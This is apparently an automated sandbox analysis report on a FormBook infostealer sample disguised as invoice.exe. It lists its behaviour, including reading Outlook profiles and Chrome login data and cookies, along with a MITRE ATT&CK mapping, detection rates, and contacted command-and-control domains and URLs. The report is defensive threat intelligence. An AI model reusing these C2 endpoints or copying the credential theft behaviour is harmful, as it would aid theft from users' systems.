Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	1 DLL Side-Loading	712 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	1 Input Capture	2 Process Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	712 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	1 Data from Local System	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	13 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	4 Obfuscated Files or Information	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
invoice.exe	45%	ReversingLabs	ByteCode-MSIL.Spyware.Noon
invoice.exe	36%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.0.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Link
www.53kzl.xyz	0%	Virustotal	Browse
bunniesfor-sales.site	2%	Virustotal	Browse
www.soft-r.pro	0%	Virustotal	Browse
www.bunniesfor-sales.site	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://en.w	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://soft-r.pro/dj6o/?7n9pqx=K2Mp5pqx32_lRZL&tVw=vnB24m7zYuqz1tM6	0%	Avira URL Cloud	safe
http://www.soft-r.pro/dj6o/?7n9pqx=K2Mp5pqx32_lRZL&tVw=vnB24m7zYuqz1tM6+OXGectY250cZexgkvx801FyUM6ApfRgmaMK0bHsyxLM1s80XjTXf2isqV5CX5YJjqjmDhpmcD58xmf+Uw==	0%	Avira URL Cloud	safe
http://www.soft-r.pro/dj6o/	0%	Avira URL Cloud	safe
http://www.53kzl.xyz/dj6o/?tVw=h04kayJb3ljXRQcX7vvRWSjXbEa8Wdd7FpeJSrMka0q/M3vTEVv/IaMbJiFl7sx9hbZGfk4FCy3OyfUPlJlZw4D92suLIakcOQ==&7n9pqx=K2Mp5pqx32_lRZL	0%	Avira URL Cloud	safe
www.hotelarta.cloud/dj6o/	0%	Avira URL Cloud	safe
http://181ue.com/sq.html?entry=	0%	Avira URL Cloud	safe
http://www.53kzl.xyz/dj6o/	0%	Avira URL Cloud	safe
http://www.bunniesfor-sales.site/dj6o/?7n9pqx=K2Mp5pqx32_lRZL&tVw=NMTOyXsc8ePY2MKPEps/R25z0YSV56yvdacE+LTNH3L/G6DIQ9NvLR18puwfz5ktIQRwsxKrERsH/7mcoV+cyDukUw1T3fVygQ==	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.53kzl.xyz	35.241.57.73	true	false	0%, Virustotal, Browse	unknown
bunniesfor-sales.site	64.190.62.22	true	true	2%, Virustotal, Browse	unknown
www.soft-r.pro	194.58.112.174	true	true	0%, Virustotal, Browse	unknown
www.bunniesfor-sales.site	unknown	unknown	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.soft-r.pro/dj6o/	true	Avira URL Cloud: safe	unknown
www.hotelarta.cloud/dj6o/	true	Avira URL Cloud: safe	low
http://www.soft-r.pro/dj6o/?7n9pqx=K2Mp5pqx32_lRZL&tVw=vnB24m7zYuqz1tM6+OXGectY250cZexgkvx801FyUM6ApfRgmaMK0bHsyxLM1s80XjTXf2isqV5CX5YJjqjmDhpmcD58xmf+Uw==	true	Avira URL Cloud: safe	unknown
http://www.53kzl.xyz/dj6o/?tVw=h04kayJb3ljXRQcX7vvRWSjXbEa8Wdd7FpeJSrMka0q/M3vTEVv/IaMbJiFl7sx9hbZGfk4FCy3OyfUPlJlZw4D92suLIakcOQ==&7n9pqx=K2Mp5pqx32_lRZL	false	Avira URL Cloud: safe	unknown
http://www.53kzl.xyz/dj6o/	false	Avira URL Cloud: safe	unknown
http://www.bunniesfor-sales.site/dj6o/?7n9pqx=K2Mp5pqx32_lRZL&tVw=NMTOyXsc8ePY2MKPEps/R25z0YSV56yvdacE+LTNH3L/G6DIQ9NvLR18puwfz5ktIQRwsxKrERsH/7mcoV+cyDukUw1T3fVygQ==	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.b0a57cbbe8efd7017472.js	msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	msiexec.exe, 0000000C.00000002.506380839.000000000085C000.00000004.00000020.00020000.00000000.sdmp, C5G1Z47d2.12.dr	false		high
http://www.fontbureau.com/designersG	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	C5G1Z47d2.12.dr	false		high
http://www.fontbureau.com/designers/?	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://img.sedoparking.com	msiexec.exe, 0000000C.00000002.510045303.0000000004D06000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfpf	msiexec.exe, 0000000C.00000002.506380839.000000000085C000.00000004.00000020.00020000.00000000.sdmp, C5G1Z47d2.12.dr	false		high
https://track.uc.cn/collect	msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://github.com/cipher450	invoice.exe	false		high
http://www.fontbureau.com/designers	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://hm.baidu.com/hm.js?	msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	false		high
http://soft-r.pro/dj6o/?7n9pqx=K2Mp5pqx32_lRZL&tVw=vnB24m7zYuqz1tM6	msiexec.exe, 0000000C.00000002.510216678.000000000502A000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
